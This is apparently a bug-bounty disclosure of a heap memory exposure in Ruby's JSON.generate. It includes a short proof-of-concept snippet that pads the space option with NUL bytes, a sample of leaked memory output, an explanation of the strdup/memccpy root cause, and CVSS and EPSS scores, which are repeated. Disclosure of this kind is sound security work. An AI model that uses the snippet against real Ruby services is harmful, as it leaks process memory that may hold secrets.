AhmadsherifH1:209949Ruby: Arbitrary heap exposure in JSON.generate
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.008 Low
EPSS
Percentile
79.3%
Running this snippet can expose arbitrary memory:
require 'json'
state = JSON.state.new
state.space = "\0" * 1024
puts JSON.generate({a: :b}, state)
{"a":
psych/handlers/recorder.rb
tensi0
reeze)
Gem::Specification.new do |s|
# to objects of the same type as the original delegate.
mydata/scm/git/ruby/dist/lib/ruby/2.5.0/json/ext.rb
pass the namP
See http://guides.rubygems.org/specification-reference/ for help
# # constant and class member data initialization...
"b"}
The issues lies in using strdup in generator.c, which will stop after encountering a NULL byte returning a pointer to zero length string, which is not the length stored in space_len. Eventually fbuffer_append will copy the length of the string (e.g. the 1024 above) into the generated buffer.
Simpler snippets like JSON.generate({foo: "bar"}, space: "\0" * 1024 suffer the same issue but for slightly different reason; as fstrndup is using memccpy which will, again, stop copying after encountering a NULL byte returning a pointer to zero length string.
Related
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.008 Low
EPSS
Percentile
79.3%